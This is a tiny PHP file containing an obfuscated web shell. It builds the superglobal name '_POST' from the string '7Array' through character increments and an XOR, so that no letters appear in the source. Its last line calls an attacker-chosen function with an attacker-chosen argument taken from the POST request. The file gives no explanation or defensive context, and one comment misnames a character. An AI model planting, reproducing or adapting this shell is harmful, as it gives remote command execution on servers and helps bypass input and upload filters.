<?=1;
${1}=7;
${2}{1}=2;
${3}=${1}.${2};
${4}=${3}{1};   //A
${5}=${3}{4};   //y
++${5};++${5};++${5};++${5};++${5};++${5};++${5};
${6}=${3}{0}^${5};  // '7' ^ 'h' = '_'
++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};++${4};
${7}=${4}; //O
++${4};
${8}=${4}; //P
++${4};++${4};++${4};
${9}=${4}; //S
++${4};
${10}=${4}; //T
${11}=${6}.${8}.${7}.${9}.${10};
${${11}}{1}(${${11}}{0});
?>
